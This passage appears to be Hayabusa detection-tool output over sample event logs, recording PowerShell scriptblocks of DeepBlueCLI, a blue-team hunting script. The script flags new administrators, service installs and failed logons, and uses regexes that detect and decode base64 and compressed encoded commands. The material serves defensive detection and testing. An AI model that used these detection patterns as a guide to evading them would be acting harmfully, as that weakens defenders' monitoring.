$commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:05.029 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:05.032 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:18.017 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:18.017 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:18.018 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:18.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:18.046 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:18.048 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:18.049 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:19.155 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:35.122 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:35.127 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:35.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" 